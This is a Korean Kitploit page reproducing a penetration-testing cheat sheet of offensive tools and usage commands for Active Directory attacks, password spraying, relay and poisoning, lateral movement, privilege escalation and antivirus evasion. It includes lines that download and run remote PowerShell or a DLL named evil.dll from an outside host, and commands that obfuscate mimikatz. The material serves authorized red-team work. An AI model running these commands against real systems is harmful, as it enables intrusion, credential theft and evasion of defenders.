Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Pentest-Tools-Collection — Active Directory 공격, C2, 권한 상승, 난독화 및 웹 침투 테스트를 위한 공격형 보안 도구와 명령어의 엄선된 모음입니다. | Kitploit
도구/GitHubGitHub/luemmelsec/pentest-tools-collection
Privilege EscalationExploitationIDS/IPS EvasionInformation GatheringPost-ExploitationPenetration TestingCommand and ControlRed TeamingCurated Resources

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubluemmelsec/pentest-tools-collection

Pentest-Tools-Collection

Active Directory 공격, C2, 권한 상승, 난독화 및 웹 침투 테스트를 위한 공격형 보안 도구와 명령어의 엄선된 모음입니다.

저장소 보기
90614631개월 전Kitploit 검토 완료

Pentest 도구 모음

Active Directory

AMSI

https://amsi.fail/

도구 모음

WinPwn

https://github.com/S3cur3Th1sSh1t/WinPwn

Import-Module .\WinPwn.ps1

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Ghostpack

https://github.com/GhostPack

Seatbelt, KeeThief, Rubeus, SharpUp ...

Powersploit

https://github.com/PowerShellMafia/PowerSploit

PowerView, PowerUp, Get-GPPPassword ...

열거

Bloodhound

https://github.com/BloodHoundAD/BloodHound

SharpHound.exe -d testdomain.com -c all,gpolocalgroup

Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup

https://github.com/fox-it/BloodHound.py

bloodhound.py -c all

ADRecon

https://github.com/adrecon/ADRecon

도메인 구성원 호스트에서 ADRecon을 실행하려면.
PS C:\> .\ADRecon.ps1

도메인 구성원 호스트에서 다른 사용자로 ADRecon을 실행하려면.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

LDAP을 사용하여 비구성원 호스트에서 ADRecon을 실행하려면.
PS C:\>.\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>

Spraying-Toolkit

https://github.com/byt3bl33d3r/SprayingToolkit

Lync/Skype 및 OWA 스프레이어, 워드리스트 생성기, 명명 체계 변환기 등.

OWA 스프레이
./atomizer.py owa contoso.com 'Fall2018' emails.txt

Lync 스프레이
./atomizer lync contoso.com --user-as-pass usernames.txt

정찰 모드
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon

MailSniper

https://github.com/dafthack/MailSniper

OWA 및 EWS 공격
명명 체계는 testdomain.com\schmidta 또는 aschmidt 형식이어야 합니다 -> msf 모듈로 체계를 확인하세요

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt

Get-ADUsernameFromEWS -EmailList email-list.txt

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt

msspray

https://github.com/0xZDH/msspray

O365 열거 및 스프레이 도구

스프레이 없이 사용자만 열거합니다. [email protected] 형식의 전체 메일 주소가 포함된 텍스트 파일이 필요합니다.
python3 msspray.py -e -u textfile.txt --wait 10 --verbose

MSOLSpray

https://github.com/dafthack/MSOLSpray

O365 스프레이어

Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

ExchangeRelayX

https://github.com/quickbreach/ExchangeRelayX

HTTP를 통한 NTLM 인증으로 EWS를 공격합니다.

./exchangeRelayx.py -t https://mail.quickbreach.com

SharpView

https://github.com/tevora-threat/SharpView

PowerView의 .NET 포트

SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password

CrossLinked

https://github.com/m8r0wn/CrossLinked

메일 주소 / 사용자 수집

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name

포스트 익스플로잇

impacket

https://github.com/SecureAuthCorp/impacket

Crackmapexec

https://github.com/byt3bl33d3r/CrackMapExec

공식 문서: https://mpgn.gitbook.io/crackmapexec/

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

EvilWinRM

https://github.com/mrnamp/EvilWinRM

Linux 머신에서 Microsoft의 WS-Management 구현(일명 Powershell-Remoting)과 상호 작용하기 위한 도구입니다.
비밀번호 대신 해시로 연결하는 데에도 사용할 수 있습니다.

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099

또한 이후 C#, DLL 또는 donut 셸코드를 메모리에서 직접 실행할 수 있습니다. 실행 파일은 -e 인수에 설정된 경로에 있어야 합니다.

Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

Dll-loader -http -path http://10.11.12.13/evil.dll

Donut-Loader -process_id 1234 -donutfile /use/share/payload.bin

AMSI 우회, Kerberos 티켓 획득 등도 가능합니다 ...

SharpRDP

https://github.com/rasta-mouse/SharpRDP

RDP를 통해 작업을 실행합니다. 다중 RDP가 활성화되어 있지 않으면 사용자에게 알림이 표시됩니다!

SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password

Inveigh

https://github.com/Kevin-Robertson/Inveigh

PowerShell ADIDNS/LLMNR/mDNS/NBNS/DNS 스푸퍼 및 중간자 공격(MITM) 도구

Import-Module Inveigh.psm1

Invoke-Inveigh -Consoleoutput Y

Responder

https://github.com/lgandx/Responder

LLMNR/NBT-NS/mDNS 포이즈너

./Responder.py -I eth0

C2

Covenant

https://github.com/cobbr/Covenant

PS-Empire

https://github.com/BC-SECURITY/Empire

PrivEsc

WinPEAS / LinPEAS

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

SecWiki

https://github.com/SecWiki

Linux 및 Windows용 익스플로잇

PowerShDll

https://github.com/p3nt4/PowerShdll

PowerShell 없이 PowerShell

rundll32 PowerShdll,main -w

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

UACME

https://github.com/hfiref0x/UACME

Watson

https://github.com/rasta-mouse/Watson

PrivescCheck

https://github.com/itm4n/PrivescCheck

난독화

PEzor

https://github.com/phra/PEzor

C / C++ 바이너리 난독화

새 모듈 -> ShellCode fluctuation:

PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'

참조: https://twitter.com/phraaaaaaa/status/1453389564383404032?t=wcB-3NlNh9725L9_zRjdHg

Donut Syscall fork

https://github.com/S4ntiagoP/donut/tree/syscalls

시스콜을 사용하는 Donut 셸코드 / PE 생성기의 포크

amber

https://github.com/EgeBalci/amber

C / C++ 바이너리 난독화

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

PowerShell 스크립트용 난독화기.

xencrypt / BetterXencrypt

https://github.com/the-xentropy/xencrypt / https://github.com/GetRektBoy724/BetterXencrypt

AQUARMOURY (in special wraith)

https://github.com/slaeryan/AQUARMOURY

AV/EDR 등을 우회하기 위한 도구 모음

root@kitploit:~
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100

PowerShell 스크립트용 난독화기 및 암호화기.

ISESteroids

https://www.powershellgallery.com/packages/ISESteroids/2.7.1.7

PowerShell ISE용 도구 모음. 난독화 기능을 제공합니다.

PS2EXE

https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5

PS1을 EXE 파일로 변환합니다.

Invoke-Sharploader

https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader

페이로드를 암호화하고 메모리에서 복호화하는 C# 바이너리용 래퍼입니다.

바이너리 암호화:

Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

URL에서 암호화된 바이너리 로드:

Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs

디스크에서 명령줄 인수와 함께 암호화된 바이너리 로드:

Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

inceptor

https://github.com/klezVirus/inceptor

C# 및 PowerShell용 난독화기

Chimera

https://github.com/tokyoneon/Chimera

PowerShell 스크립트 난독화기

InvisibilityCloak

https://github.com/xforcered/InvisibilityCloak

C# 어셈블리 난독화기

ConfuserEx

https://github.com/yck1509/ConfuserEx

C# 어셈블리 난독화기

Charlotte

https://github.com/9emin1/charlotte

D-Invoke를 통한 셸코드 로더

AVCleaner

https://github.com/lleon1435/avcleaner

C/C++ 소스 난독화기

기타

SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray

웹

JSFScan: https://github.com/KathanP19/JSFScan.sh

도구 다운로드